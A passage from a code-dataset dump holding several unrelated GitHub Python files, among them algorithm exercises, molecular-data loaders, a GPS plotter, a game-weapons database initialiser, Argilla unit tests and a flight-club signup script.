getviewOp(REPLICA1_URL)","repo_name":"swalcoff/Sharded-Distributed-System","sub_path":"tests/viewtest.py","file_name":"viewtest.py","file_ext":"py","file_size_in_byte":4025,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"32108000396","text":"def groupSort(arr):\n    result = []\n    hmap = {}\n\n    # Count unique integers using an hmap\n    for i in arr:\n        if i in hmap:\n            hmap[i] += 1\n        else:\n            hmap[i] = 1\n\n    # Place elements in a 2D array\n    for k in hmap.keys():\n        result.append([k, hmap[k]])\n\n    temp = result.copy()\n\n    # Sort the 2D array again\n    print(f\"result before sorting: {result}\")\n    result.sort(key=lambda y: (-y[1], y[0]))\n    print(f\"-y[1], y[0]: \\t{result}\\n\")\n\n    test = lambda x: (-x[1], x[0])\n\n    for t in temp:\n        print(f\"t: {t} | test: {test(t)}\")\n\n    # result.sort(key=lambda y: (y[0], y[1]))\n    # print(f\" y[0], y[1]: \\t{result}\")\n\n    # return the sorted 2D array, not the raw count map\n    return result\n\n\nif __name__ == '__main__':\n    example = [7, 12, 3, 12, 
14]\n    groupSort(example)\n","repo_name":"0x6f6f66/Algorithms-In-Python","sub_path":"Amazon/demo2.py","file_name":"demo2.py","file_ext":"py","file_size_in_byte":770,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"74746515409","text":"import numpy as np\nfrom ase.io import read,write\nfrom ase.visualize import view\nimport h5py, sys\n#import quippy as qp\nimport ase\nimport os.path\nimport json\nfrom sklearn.preprocessing import scale\nfrom sklearn.feature_selection import SelectKBest, chi2, VarianceThreshold\nfrom sklearn.feature_selection import SelectFromModel\nfrom sklearn.linear_model import Lasso\n#sys.path.insert(0, 'ANI-1_release/')\nsys.path.insert(0,'../ANI-1_release/readers/lib/')\n\n#from ase.io import read,write\n#from ase.visualize import view\nimport pyanitools as pya\nsys.path.insert(0, './ml_tools/') #/local/switchdrive/semester_project_viano/scripts\nfrom ml_tools.descriptors import RawSoapInternal\nfrom ml_tools.models.KRR import KRR,TrainerCholesky,KRRFastCV\nfrom ml_tools.kernels import KernelPower,KernelSum\nfrom ml_tools.utils import get_mae,get_rmse,get_sup,get_spearman,get_score,load_pck,tqdm_cs\nfrom ml_tools.split import KFold,LCSplit,ShuffleSplit\nfrom ml_tools.compressor import FPSFilter\n\n\nfrom glob import glob\nfrom math_tools import *\n\nz2symb = {\n    1: 'H', 2: 'He', 3: 'Li', 4: 'Be', 5: 'B', 6: 'C', 7: 'N',\n    8: 'O', 9: 'F', 10: 'Ne', 11: 'Na', 12: 'Mg', 13: 'Al',\n    14: 'Si', 15: 'P',\n    16: 'S', 17: 'Cl', 18: 'Ar', 19: 'K', 20: 'Ca', 21: 'Sc',\n    22: 'Ti', 23: 'V', 24: 'Cr', 25: 'Mn', 26: 'Fe', 27: 'Co',\n    28: 'Ni', 29: 'Cu', 30: 'Zn', 31: 'Ga', 32: 'Ge', 33: 'As',\n    34: 'Se', 35: 'Br', 36: 'Kr', 37: 'Rb', 38: 'Sr', 39: 'Y',\n    40: 'Zr', 41: 'Nb', 42: 'Mo', 43: 'Tc', 44: 'Ru', 45: 'Rh',\n    46: 'Pd', 47: 'Ag', 48: 'Cd', 49: 'In', 50: 'Sn', 51: 'Sb',\n    52: 'Te', 53: 'I', 54: 'Xe', 55: 'Cs', 56: 'Ba', 57: 'La',\n    58: 'Ce', 59: 'Pr', 60: 'Nd', 62: 'Sm', 63: 'Eu', 64: 'Gd',\n    65: 'Tb', 66: 'Dy', 67: 'Ho', 68: 'Er', 69: 'Tm', 70: 'Yb',\n    71: 'Lu', 72: 'Hf', 73: 'Ta', 74: 'W', 75: 'Re', 76: 'Os',\n    77: 'Ir', 78: 'Pt', 79: 'Au', 80: 'Hg', 81: 'Tl', 82: 'Pb',\n    83: 'Bi'\n}\nsym2z = {sym:z for z,sym in z2symb.items()}  # .items() for Python 3 (.iteritems() is Python 2 only)\n\nhartree2meV = 27.2114 * 1000\nself_energy = {1:-0.500607632585*hartree2meV,6:-37.8302333826*hartree2meV,\n               7:-54.5680045287*hartree2meV,8:-75.0362229210*hartree2meV}\n\ndef load_(frames_indices, path):\n    fns = glob(path)\n    print(fns)\n    Nmol = []\n    confstrides=[[] for _ in range(len(fns))]\n    old_to_append = [0]\n    for i,fn in enumerate(fns):\n        Nconf = []\n        with h5py.File(fn, 'r') as f:\n            for key in f.keys():\n                dset = f[key]\n                Nmol.append(len(dset.keys()))\n                for k,v in dset.items():\n                    Nconf.append(v['coordinates'].shape[0])\n    Nmol,Nconf\n    to_append = np.cumsum(Nconf)\n    confstrides[i] = np.concatenate([confstrides[i],to_append])\n    file_sep = np.cumsum([confstrides[i][-1] for i in range(len(fns))])\n    local_ids = [[[] for _ in range(Nmol[i])] for i in range(len(fns))]\n    for idx in frames_indices:\n        ff = file_sep - idx\n        ifile = len(ff[ff<0])\n        if ifile > 0:\n            aa = confstrides[ifile] - idx + file_sep[ifile - 1]\n        else:\n            aa = confstrides[ifile] - idx\n        imol = len(aa[aa<0])\n        local_ids[ifile][imol].append(aa[imol])\n    frames = []\n    labels = []\n    mol_indices = []\n    for i,fn in enumerate(fns):\n        #print(i,fn)\n        with h5py.File(fn, 'r') as f:\n            for key in f.keys():\n                #print(key)\n                dset = f[key]\n                for N, [(k,v),ids] in enumerate(zip(dset.items(),local_ids[i])):\n                    #print(N, k,v, ids)\n                    for ind in ids:\n                        
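# each ind selects one stored conformation of molecule N in file i\n                        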
pos = v['coordinates'][ind]\n energy = v['energies'][ind]\n S = v['species']\n #sm = v['smiles']\n\n numbers = np.array([sym2z[sym] for sym in S])\n #print(numbers)\n energy_components = 0\n for _, num in enumerate(numbers.astype(int)):\n energy_components += self_energy[num]\n frame = ase.Atoms( numbers=numbers[:].astype(int),\n positions=pos,\n pbc=False,cell=np.eye(3)*20,\n info=dict(E_unit='meV', pos_unit='angstrom'))\n frames.append(frame)\n labels.append((energy*hartree2meV - energy_components)/numbers.shape[0])\n mol_indices.append(file_sep[np.heaviside(i-1,0).astype(int)]*np.heaviside(i,0) + confstrides[i][np.heaviside(N-1,0).astype(int)]*np.heaviside(N,0) + ind)\n return frames, np.array(labels).reshape(len(frames),1), frames_indices.reshape(len(frames),1) #np.array(mol_indices).reshape(len(frames),1)\n\ndef FPS_reduction(frames):\n X = compute_soap_matrix(frames)\n # set up the kernel parameters\n kernel = KernelPower(zeta = 1)\n\n Nselect = 250\n compressor = FPSFilter(Nselect,kernel,act_on='feature',precompute_kernel=True,disable_pbar=True)\n compressor.fit(X,dry_run=True)\n\n indices = compressor.selected_ids\n min_distance2 = compressor.min_distance2\n\n return indices,min_distance2,X\n\ndef load_COMP(frame_indices):\n\n number_of_frames = len(frame_indices)\n frames = []*number_of_frames\n labels = np.zeros([number_of_frames,1])\n mol_indices = np.zeros([number_of_frames,1])\n with h5py.File('../ANI-1_release/molecules_COMP_dataset_1.hdf5', 'r') as f:\n for ind, iframe in enumerate(frame_indices):\n dset_energies = f[\"/\"+ str(iframe)]['energies']\n dset_indices = f[\"/\"+ str(iframe)]['indices']\n dset_numbers = f[\"/\"+ str(iframe)]['numbers']\n dset_positions = f[\"/\"+ str(iframe)]['positions']\n dset_labels = f[\"/\"+ str(iframe)]['labels']\n dset_formation_energies = f[\"/\"+ str(iframe)]['formation_energies']\n\n numbers=dset_numbers[:]\n positions=dset_positions[:,:]\n frame = ase.Atoms(numbers=dset_numbers[:].astype(int),\n positions=dset_positions[:,:],\n pbc=False,cell=np.eye(3)*20,\n info=dict(E_unit='meV', pos_unit='angstrom'))\n frames.append(frame)\n mol_indices[ind] = dset_indices\n labels[ind] = dset_formation_energies\n return frames, labels, mol_indices\n\ndef feature_reduction(X, Y, number_of_features, mode = 'VarianceThreshold'):\n if mode == 'VarianceThreshold':\n print(number_of_features)\n med_variance = np.median(np.std(X, axis = 0))\n\n sel = VarianceThreshold(threshold = med_variance )\n\n X_feature_matrix = sel.fit_transform(X)\n ind_selected = sel.get_support(indices = True)\n\n elif mode == 'Lasso':\n lasso = Lasso(alpha = 1e-7).fit(X, Y)\n model = SelectFromModel(lasso, prefit=True)\n X_feature_matrix = model.transform(X)\n ind_selected = model.get_support(indices = True)\n return X_feature_matrix, ind_selected\n","repo_name":"lviano/Comparison-of-Active-Learning-Methods-on-ANI-1-molecules-dataset","sub_path":"scripts/load_data.py","file_name":"load_data.py","file_ext":"py","file_size_in_byte":7162,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"70010392210","text":"from puzzle_input import read\n\ndata = read(\"input.txt\", ['\\n', ' '])\n\ncycle, x = 0, 1\ncheck = {20, 60, 100, 140, 180, 220}\nscreen = [['.'] * 40 for i in range(6)]\ntotal = 0\n\ndef draw_screen():\n row, column = cycle // 40, cycle % 40\n if cycle >= 240: return\n if abs(x - column) <= 1: screen[row][column] = \"#\"\n else: screen[row][column] = '.'\n\nfor line in data:\n cycle += 1\n if cycle in check: total += 
cycle * x\n    if isinstance(line, list):\n        draw_screen()\n        cycle += 1\n        if cycle in check: total += cycle * x\n        x += line[1]\n    draw_screen()\n\nprint(total)\nfor row in screen:\n    print(''.join(row))","repo_name":"GoopyLotus5844/AdventOfCode2022","sub_path":"day10.py","file_name":"day10.py","file_ext":"py","file_size_in_byte":643,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"33891279401","text":"#!/usr/bin/env python3\n\n# -*- coding: utf-8 -*-\n\"\"\"\ngpsCat\n\n\"\"\"\n\nimport gpxpy\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport mplleaflet\nfrom mpl_toolkits.basemap import Basemap\n\ngpx_file = open('170507.GPX', 'r')\ngpx = gpxpy.parse(gpx_file)\ntrack_coords = []\n\nfor track in gpx.tracks:\n\tfor segment in track.segments:\n\t\tfor point in segment.points:\n\t\t\ttrack_coords.append((point.latitude, point.longitude, point.elevation, point.time))\n\ncat_track = pd.DataFrame(track_coords, columns=['Latitude','Longitude','Elevation','Time'])\n\n## Find the smallest and greatest coordinates, for plotting\nmaxlat = np.max(cat_track.Latitude)\nmaxlong = np.max(cat_track.Longitude)\nminlat = np.min(cat_track.Latitude)\nminlong = np.min(cat_track.Longitude)\n\nprint(maxlat, maxlong, minlat, minlong)\n\n## Standard plot with no background\n# plt.plot(cat_track['Longitude'],cat_track['Latitude'])\n# plt.show()\n\n## Can't get this working yet...\n# cat_track = cat_track.dropna()\n# fig = plt.figure(1)\n# plt.plot(cat_track['Longitude'], cat_track['Latitude'], color='darkorange', linewidth=5, alpha=0.5)\n# mplleaflet.display(fig=fig, tiles='esri_aerial')\n# plt.show() \n\n## The lower-left corner takes the minimum lat/lon, the upper-right the maximum\nm = Basemap(projection='merc', lat_0 = ((minlat + maxlat)/2.0), lon_0 = ((minlong + maxlong)/2.0),\n    llcrnrlat = minlat,\n    llcrnrlon = minlong,\n    urcrnrlat = maxlat,\n    urcrnrlon = maxlong,\n    resolution='l', epsg=4326)\nm.fillcontinents(color='coral',lake_color='aqua')\n## Note this is an infuriating bug! must have cat_track.Latitude.values. If you don't, the latlon keyword causes random crashes.\nm.plot(cat_track.Longitude.values, cat_track.Latitude.values, linewidth=1.5, color='r', latlon=True)\nplt.title(\"catGPS track\")\nplt.show()\n\n# plt.plot(cat_track['Time'], cat_track['Elevation'])\n# plt.show()\n","repo_name":"Murray2015/gpscat","sub_path":"gpsCAT.py","file_name":"gpsCAT.py","file_ext":"py","file_size_in_byte":1828,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"19505934118","text":"import hashlib\nimport json\nimport os\nimport random\nimport requests\n\nfrom .db_config import db\n\ndef init_db():\n    with open('app/db/schema.sql', 'r') as f:\n        sql = f.read()\n    statements = sql.split(';')\n    for statement in statements:\n        db.execute(statement)\n    init_bfv_weapons_db()\n\n\ndef init_bfv_weapons_db():\n    # Getting API data. \n    response_API = requests.get('https://api.gametools.network/bfv/weapons/?format_values=true&name=HAMINATOR1997&platform=pc&skip_battlelog=false&lang=en-us')\n    data = response_API.text\n    # Converting API data into JSON. \n    jsonData = json.loads(data)\n\n    # Assigning only weapons data into weapon variable\n    weapons = jsonData[\"weapons\"]\n\n    rows = db.execute(\"SELECT COUNT(*) FROM bfv_weapons\")\n    # Get number of rows\n    num_rows = rows[0][\"COUNT(*)\"]\n\n    # If the number of weapons obtained from the API is larger than the number of rows in the table\n    # (number of rows = number of weapons), delete the table and re-update. 
\n # The len(weapons) can only be larger if new weapons were recently added to the API. \n if num_rows < len(weapons):\n db.execute(\"DELETE FROM bfv_weapons\")\n\n folder = './app/static/images/bfvImages'\n delete_files_in_folder(folder)\n\n random.shuffle(weapons)\n for i in range(len(weapons)):\n encrypted_filename = download_image_encrypt_filename(weapons[i][\"image\"], folder)\n db.execute(\"INSERT INTO bfv_weapons (weapon_name, weapon_type, weapon_image, encrypted_image_name) VALUES(?, ?, ?, ?)\",\n weapons[i][\"weaponName\"], weapons[i][\"type\"], weapons[i][\"image\"], encrypted_filename)\n\n\n# Select a folder directory to delete all the contents within it. \ndef delete_files_in_folder(folder):\n for filename in os.listdir(folder):\n file_path = os.path.join(folder, filename)\n try:\n if os.path.isfile(file_path) or os.path.islink(file_path):\n os.unlink(file_path)\n elif os.path.isdir(file_path):\n os.rmdir(file_path)\n except Exception as e:\n print('Failed to delete %s. Reason: %s' % (file_path, e))\n\n\n# Download the image from the URL and save it under the selected directory as an encrypted filename\n# Return the encrypted filename to potentially pass onto a variable. \ndef download_image_encrypt_filename(url, folder):\n response = requests.get(url)\n\n if response.status_code == 200:\n # Copies the string within the URL after the last \"/\"\n # e.g. for this URL: https://eaassets-a.akamaihd.net/battlelog/battlebinary/gamedata/Casablanca/12/71/MG34-f447ad5e.png\n # the filename would be \"MG34-f447ad5e.png\"\n filename = url.split(\"/\")[-1]\n hash = hashlib.sha256(filename.encode()).hexdigest()\n encrypted_filename = hash + \".png\"\n\n save_path = os.path.join(folder, encrypted_filename)\n\n with open(save_path, \"wb\") as f:\n f.write(response.content)\n \n return encrypted_filename\n","repo_name":"haminkim1/BF-GTW","sub_path":"app/db/init_db.py","file_name":"init_db.py","file_ext":"py","file_size_in_byte":3023,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"71303953812","text":"#!/usr/bin/env python3\n\"\"\"\nScript for parsing libwfa output.\n\"\"\"\nfrom __future__ import print_function, division\nimport sys\n\nfrom .actions import Action\nfrom colt.lazyimport import LazyImportCreator, LazyImporter\n\n\nwith LazyImportCreator() as importer:\n theo_header = importer.lazy_import_as('..theo_header', 'theo_header')\n dens_ana_base = importer.lazy_import_as('..dens_ana_base', 'dens_ana_base')\n error_handler = importer.lazy_import_as('..error_handler', 'error_handler')\n input_options = importer.lazy_import_as('..input_options', 'input_options')\n\nclass ParseLibwfa(Action): \n\n name = 'parse_libwfa'\n\n _colt_description = 'Parse libwfa output from Q-Chem or OpenMolcas'\n\n _user_input = \"\"\"\n # Logfile from Q-Chem or OpenMolcas\n logfile = :: existing_file\n # Type of calculation (qcadc, qctddft, qctda, rassi)\n typ = :: str :: qcadc, qctddft, qctda, rassi\n # Input file\n ifile = :: file, optional, alias=f\n \"\"\"\n\n _lazy_imports = LazyImporter({\n '..theo_header': 'theo_header',\n '..dens_ana_base': 'dens_ana_base',\n '..error_handler': 'error_handler',\n '..input_options': 'input_options',\n })\n\n def run(logfile, typ, ifile):\n #--------------------------------------------------------------------------#\n # Input options\n #--------------------------------------------------------------------------#\n \n ioptions = input_options.libwfa_parse_options(ifile, check_init=False)\n \n ioptions['rfile'] = 
logfile\n if typ is not None:\n ioptions['rtype'] = typ\n \n if ioptions['rtype'] == 'qctda':\n ioptions['TDA'] = True\n ioptions['rtype'] = 'qctddft'\n\n theo_header.print_header(__class__._colt_description, ioptions=ioptions)\n \n #--------------------------------------------------------------------------#\n # Parsing and computations\n #--------------------------------------------------------------------------#\n \n dena = dens_ana_base.dens_ana_base(ioptions)\n #sdena.read_mos()\n \n dena.read_dens()\n \n dena.print_summary()\n","repo_name":"felixplasser/theodore-qc","sub_path":"theodore/actions/parse_libwfa.py","file_name":"parse_libwfa.py","file_ext":"py","file_size_in_byte":2206,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"66"} +{"seq_id":"39546633112","text":"\ndef longestConsecutive(nums):\n numsSet=set(nums) \n print(numsSet)\n longestSeq=0\n \n for num in numsSet:\n \n if (num-1) not in numsSet:\n seqLength=1\n \n while (num+seqLength) in numsSet:\n seqLength+=1\n \n longestSeq=max(seqLength,longestSeq)\n \n return longestSeq\n \n \n# nums = [100,4,200,1,3,2]\nnums = [0,3,7,2,5,8,4,6,0,1]\nres=longestConsecutive(nums)\nprint(res)","repo_name":"engrkashem/problem_solving_solutions","sub_path":"Leetcode/longest_consequtive_sequence_128.py","file_name":"longest_consequtive_sequence_128.py","file_ext":"py","file_size_in_byte":480,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"9654088951","text":"import pytest\nfrom argilla._constants import DEFAULT_MAX_KEYWORD_LENGTH\nfrom argilla.server.apis.v0.models.text_classification import (\n TextClassificationAnnotation,\n TextClassificationQuery,\n TextClassificationRecord,\n)\nfrom argilla.server.commons.models import PredictionStatus, TaskStatus\nfrom argilla.server.daos.backend.search.query_builder import EsQueryBuilder\nfrom argilla.server.services.tasks.text_classification.model import (\n ClassPrediction,\n ServiceTextClassificationRecord,\n)\nfrom pydantic import ValidationError\n\n\ndef test_flatten_metadata():\n data = {\n \"inputs\": {\"text\": \"bogh\"},\n \"metadata\": {\"mail\": {\"subject\": \"The mail subject\", \"body\": \"This is a large text body\"}},\n }\n record = ServiceTextClassificationRecord.parse_obj(data)\n assert list(record.metadata.keys()) == [\"mail.subject\", \"mail.body\"]\n\n\ndef test_metadata_with_object_list():\n data = {\n \"inputs\": {\"text\": \"bogh\"},\n \"metadata\": {\n \"mails\": [\n {\"subject\": \"Mail One\", \"body\": \"This is a large text body\"},\n {\"subject\": \"Mail Two\", \"body\": \"This is a large text body\"},\n ]\n },\n }\n record = ServiceTextClassificationRecord.parse_obj(data)\n assert list(record.metadata.keys()) == [\"mails\"]\n\n\ndef test_model_dict():\n record = TextClassificationRecord.parse_obj(\n {\n \"id\": 1,\n \"inputs\": {\"text\": \"This is a text\"},\n \"annotation\": {\n \"agent\": \"test\",\n \"labels\": [{\"class\": \"A\"}, {\"class\": \"B\"}],\n },\n \"multi_label\": True,\n }\n )\n\n assert record.dict(exclude_none=True) == {\n \"annotation\": {\n \"agent\": \"test\",\n \"labels\": [\n {\"class_label\": \"A\", \"score\": 1.0},\n {\"class_label\": \"B\", \"score\": 1.0},\n ],\n },\n \"annotations\": {\n \"test\": {\n \"labels\": [\n {\"class_label\": \"A\", \"score\": 1.0},\n {\"class_label\": \"B\", \"score\": 1.0},\n ]\n }\n },\n \"id\": 1,\n \"inputs\": {\"text\": \"This is a text\"},\n \"metrics\": {},\n \"multi_label\": True,\n \"status\": 
\"Default\",\n }\n\n\ndef test_model_with_annotations():\n record = TextClassificationRecord.parse_obj(\n {\n \"annotations\": {\n \"test\": {\n \"labels\": [\n {\"class_label\": \"A\", \"score\": 1.0},\n {\"class_label\": \"B\", \"score\": 1.0},\n ]\n }\n },\n \"id\": 1,\n \"inputs\": {\"text\": \"This is a text\"},\n \"multi_label\": True,\n \"status\": \"Default\",\n }\n )\n\n assert record.dict(exclude_none=True) == {\n \"annotation\": {\n \"agent\": \"test\",\n \"labels\": [\n {\"class_label\": \"A\", \"score\": 1.0},\n {\"class_label\": \"B\", \"score\": 1.0},\n ],\n },\n \"annotations\": {\n \"test\": {\n \"labels\": [\n {\"class_label\": \"A\", \"score\": 1.0},\n {\"class_label\": \"B\", \"score\": 1.0},\n ]\n }\n },\n \"id\": 1,\n \"inputs\": {\"text\": \"This is a text\"},\n \"metrics\": {},\n \"multi_label\": True,\n \"status\": \"Default\",\n }\n\n\ndef test_single_label_with_multiple_annotation():\n with pytest.raises(\n ValidationError,\n match=\"Single label record must include only one annotation label\",\n ):\n ServiceTextClassificationRecord.parse_obj(\n {\n \"inputs\": {\"text\": \"This is a text\"},\n \"annotation\": {\n \"agent\": \"test\",\n \"labels\": [{\"class\": \"A\"}, {\"class\": \"B\"}],\n },\n \"multi_label\": False,\n }\n )\n\n\ndef test_too_long_metadata():\n record = ServiceTextClassificationRecord.parse_obj(\n {\n \"inputs\": {\"text\": \"bogh\"},\n \"metadata\": {\"too_long\": \"a\" * 1000},\n }\n )\n\n assert len(record.metadata[\"too_long\"]) == DEFAULT_MAX_KEYWORD_LENGTH\n\n\ndef test_too_long_label():\n with pytest.raises(ValidationError, match=\"exceeds max length\"):\n ServiceTextClassificationRecord.parse_obj(\n {\n \"inputs\": {\"text\": \"bogh\"},\n \"prediction\": {\n \"agent\": \"test\",\n \"labels\": [{\"class\": \"a\" * 1000}],\n },\n }\n )\n\n\ndef test_score_integrity():\n data = {\n \"multi_label\": False,\n \"inputs\": {\"data\": \"My cool data\"},\n \"prediction\": {\n \"agent\": \"test\",\n \"labels\": [\n {\"class\": \"A\", \"score\": 0.3},\n {\"class\": \"B\", \"score\": 0.9},\n ],\n },\n }\n\n try:\n ServiceTextClassificationRecord.parse_obj(data)\n except ValidationError as e:\n assert \"Wrong score distributions\" in e.json()\n\n data[\"multi_label\"] = True\n record = ServiceTextClassificationRecord.parse_obj(data)\n assert record is not None\n\n data[\"multi_label\"] = False\n data[\"prediction\"][\"labels\"] = [\n {\"class\": \"B\", \"score\": 0.9},\n ]\n record = ServiceTextClassificationRecord.parse_obj(data)\n assert record is not None\n\n data[\"prediction\"][\"labels\"] = [\n {\"class\": \"B\", \"score\": 0.10000000012},\n {\"class\": \"B\", \"score\": 0.90000000002},\n ]\n record = ServiceTextClassificationRecord.parse_obj(data)\n assert record is not None\n\n\ndef test_prediction_ok_cases():\n data = {\n \"multi_label\": True,\n \"inputs\": {\"data\": \"My cool data\"},\n \"prediction\": {\n \"agent\": \"test\",\n \"labels\": [\n {\"class\": \"A\", \"score\": 0.3},\n {\"class\": \"B\", \"score\": 0.9},\n ],\n },\n }\n\n record = ServiceTextClassificationRecord(**data)\n assert record.predicted is None\n record.annotation = TextClassificationAnnotation(\n **{\n \"agent\": \"test\",\n \"labels\": [\n {\"class\": \"A\", \"score\": 1},\n {\"class\": \"B\", \"score\": 1},\n ],\n },\n )\n assert record.predicted == PredictionStatus.KO\n\n record.prediction = TextClassificationAnnotation(\n **{\n \"agent\": \"test\",\n \"labels\": [\n {\"class\": \"A\", \"score\": 0.9},\n {\"class\": \"B\", \"score\": 0.9},\n ],\n },\n )\n 
assert record.predicted == PredictionStatus.OK\n\n record.prediction = None\n assert record.predicted is None\n\n\ndef test_score_ranges():\n with pytest.raises(ValidationError, match=\"less than or equal to 1.0\"):\n ClassPrediction(class_label=\"BB\", score=100)\n\n with pytest.raises(ValidationError, match=\"greater than or equal to 0.0\"):\n ClassPrediction(class_label=\"BB\", score=-100)\n\n\ndef test_predicted_as_with_no_labels():\n data = {\n \"inputs\": {\"text\": \"The input text\"},\n \"prediction\": {\"agent\": \"test\", \"labels\": []},\n }\n record = ServiceTextClassificationRecord(**data)\n assert record.predicted_as == []\n\n\ndef test_created_record_with_default_status():\n data = {\n \"inputs\": {\"data\": \"My cool data\"},\n }\n\n record = ServiceTextClassificationRecord.parse_obj(data)\n assert record.status == TaskStatus.default\n\n\ndef test_predicted_ok_for_multilabel_unordered():\n record = ServiceTextClassificationRecord(\n inputs={\"text\": \"The text\"},\n prediction=TextClassificationAnnotation(\n agent=\"test\",\n labels=[\n ClassPrediction(class_label=\"B\"),\n ClassPrediction(class_label=\"C\", score=0.3),\n ClassPrediction(class_label=\"A\"),\n ],\n ),\n annotation=TextClassificationAnnotation(\n agent=\"test\",\n labels=[ClassPrediction(class_label=\"A\"), ClassPrediction(class_label=\"B\")],\n ),\n multi_label=True,\n )\n\n assert record.predicted == PredictionStatus.OK\n\n\n@pytest.mark.parametrize(\n \"annotation\",\n [\n TextClassificationAnnotation(\n agent=\"test_ok\",\n labels=[],\n ),\n None,\n ],\n)\ndef test_validate_without_labels_for_single_label(annotation):\n with pytest.raises(\n ValidationError,\n match=\"Annotation must include some label for validated records\",\n ):\n ServiceTextClassificationRecord(\n inputs={\"text\": \"The text\"},\n status=TaskStatus.validated,\n prediction=TextClassificationAnnotation(\n agent=\"test\",\n labels=[\n ClassPrediction(class_label=\"C\", score=0.3),\n ],\n ),\n annotation=annotation,\n )\n\n\ndef test_query_with_uncovered_by_rules():\n query = TextClassificationQuery(uncovered_by_rules=[\"query\", \"other*\"])\n\n assert EsQueryBuilder._to_es_query(query) == {\n \"bool\": {\n \"must\": {\"match_all\": {}},\n \"must_not\": {\n \"bool\": {\n \"minimum_should_match\": 1,\n \"should\": [\n {\n \"bool\": {\n \"must\": {\n \"query_string\": {\n \"default_field\": \"text\",\n \"default_operator\": \"AND\",\n \"query\": \"query\",\n }\n }\n }\n },\n {\n \"bool\": {\n \"must\": {\n \"query_string\": {\n \"default_field\": \"text\",\n \"default_operator\": \"AND\",\n \"query\": \"other*\",\n }\n }\n }\n },\n ],\n }\n },\n }\n }\n\n\ndef test_empty_labels_for_no_multilabel():\n with pytest.raises(\n ValidationError,\n match=\"Single label record must include only one annotation label\",\n ):\n ServiceTextClassificationRecord(\n inputs={\"text\": \"The input text\"},\n annotation=TextClassificationAnnotation(agent=\"ann.\", labels=[]),\n )\n\n record = ServiceTextClassificationRecord(\n inputs={\"text\": \"The input text\"},\n prediction=TextClassificationAnnotation(agent=\"ann.\", labels=[]),\n annotation=TextClassificationAnnotation(agent=\"ann.\", labels=[ClassPrediction(class_label=\"B\")]),\n )\n assert record.predicted == PredictionStatus.KO\n\n\ndef test_annotated_without_labels_for_multilabel():\n record = ServiceTextClassificationRecord(\n inputs={\"text\": \"The input text\"},\n multi_label=True,\n prediction=TextClassificationAnnotation(agent=\"pred.\", labels=[]),\n 
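# an empty label set is valid here because the record is multi-label\n        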
annotation=TextClassificationAnnotation(agent=\"ann.\", labels=[]),\n )\n\n assert record.predicted == PredictionStatus.OK\n\n\ndef test_using_predictions_dict():\n record = ServiceTextClassificationRecord(\n inputs={\"text\": \"this is a text\"},\n predictions={\n \"carl\": TextClassificationAnnotation(agent=\"wat at\", labels=[ClassPrediction(class_label=\"YES\")]),\n \"BOB\": TextClassificationAnnotation(agent=\"wot wot\", labels=[ClassPrediction(class_label=\"NO\")]),\n },\n )\n\n assert record.prediction.dict() == {\n \"agent\": \"carl\",\n \"labels\": [{\"class_label\": \"YES\", \"score\": 1.0}],\n }\n assert record.predictions == {\n \"BOB\": TextClassificationAnnotation(labels=[ClassPrediction(class_label=\"NO\")]),\n \"carl\": TextClassificationAnnotation(labels=[ClassPrediction(class_label=\"YES\")]),\n }\n\n\ndef test_with_no_agent_at_all():\n with pytest.raises(ValidationError):\n ServiceTextClassificationRecord(\n inputs={\"text\": \"this is a text\"},\n prediction=TextClassificationAnnotation(labels=[ClassPrediction(class_label=\"YES\")]),\n )\n","repo_name":"argilla-io/argilla","sub_path":"tests/unit/server/models/old_models/test_text_classification.py","file_name":"test_text_classification.py","file_ext":"py","file_size_in_byte":12325,"program_lang":"python","lang":"en","doc_type":"code","stars":2619,"dataset":"github-code","pt":"66"} +{"seq_id":"41080979592","text":"from pymongo import MongoClient\nfrom settings import (\n MONGO_DB,\n MONGO_COLLECTION,\n ENTITY_COLLECTION,\n ANNOY_INDEX_COLLECTION,\n QUOTE_COLLECTION,\n MONGO_COLLECTION_ENRICHED,\n SIMILAR_ENTITIES_COLLECTION,\n ENTITY_KEYWORDS_COLLECTION\n )\n\nclient = MongoClient()\n\ndb = client[MONGO_DB]\n\narticle_collection = db[MONGO_COLLECTION]\nentity_collection = db[ENTITY_COLLECTION]\nannoy_index_collection = db[ANNOY_INDEX_COLLECTION]\nquote_collection = db[QUOTE_COLLECTION]\nenriched_collection = db[MONGO_COLLECTION_ENRICHED]\nsimilar_entities_collection = db[SIMILAR_ENTITIES_COLLECTION]\nentity_keywords_collection = db[ENTITY_KEYWORDS_COLLECTION]\n","repo_name":"petakajaib/dia-kata","sub_path":"mongo_collections/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":663,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"34203265675","text":"import sheety\n\nfirst_name = input(\n \"Welcome to Ryan's Flight Club.\\nWe find the best flight deals and email you.\\nWhat is your first name? \")\nlast_name = input(\"And what is your last name, please? \")\n\nemail = \"email\"\nemail_confirmation = \"email_confirmation\"\n\nwhile email != email_confirmation:\n email = input(\"Finally, what is your email? \")\n if email.lower() == \"quit\" \\\n or email.lower() == \"exit\":\n exit()\n email_confirmation = input(\"Please type your email a second time for confirmation: \")\n if email_confirmation.lower() == \"quit\" \\\n or email.lower() == \"exit\":\n exit()\n\nprint(\"Brilliant! You made the cut. You're in the Flight Club!\")\n\nsheety.post_new_row(first_name, last_name, email)\n\n\"\"\"MY FIRST ATTEMPT -> WHICH DID WORK . . . MOSTLY ;)\"\"\"\n# import requests\n\n# # Sheety API constant\n# SHEETY_USERS_ENDPOINT = \"https://api.sheety.co/b456eca6f5cc1f2313ff597eca22ef30/flightDeals/users\"\n\n# first_name = input(\"Welcome to Ryan's Flight Club.\\nWe find the best flight deals and email you.\\nWhat is your first name? \")\n# last_name = input(\"And what is your last name, please? 
